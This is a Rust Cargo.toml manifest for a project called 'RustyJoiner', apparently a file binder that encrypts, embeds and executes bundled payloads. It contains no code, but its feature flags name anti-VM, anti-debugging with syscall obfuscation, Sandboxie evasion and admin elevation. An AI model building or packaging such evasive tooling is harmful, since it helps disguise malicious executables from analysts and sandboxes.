[package]
name = "RustyJoiner"
version = "1.3.0"
edition = "2021"
build = "build.rs"

[profile.release]
strip = "debuginfo"

[features]
icon = ["embed-resource"]
admin = ["embed-resource"]
build = []
enable_win_console = []
show_messagebox = ["msgbox"]
anti_vm = ["inside-vm"]
anti_debug = ["debugoff"]
anti_sandboxie = ["winapi"]

[build-dependencies]
aes-gcm = "0.10.1"
base64 = "0.21.0"
rand = "0.8.5"
embed-resource = { version = "1.8", optional = true }
yazi = "0.1.4"

[dependencies]
aes-gcm = "0.10.1"
base64 = "0.21.0"
debugoff = { version = "0.2.2", features = ["obfuscate", "syscallobf"], optional = true }
execute = "0.2.11"
inside-vm = { version = "0.2.0", optional = true }
msgbox = { version = "0.7.0", optional = true }
winapi = { version = "0.3.9", features = ["libloaderapi"], optional = true }
yazi = "0.1.4"
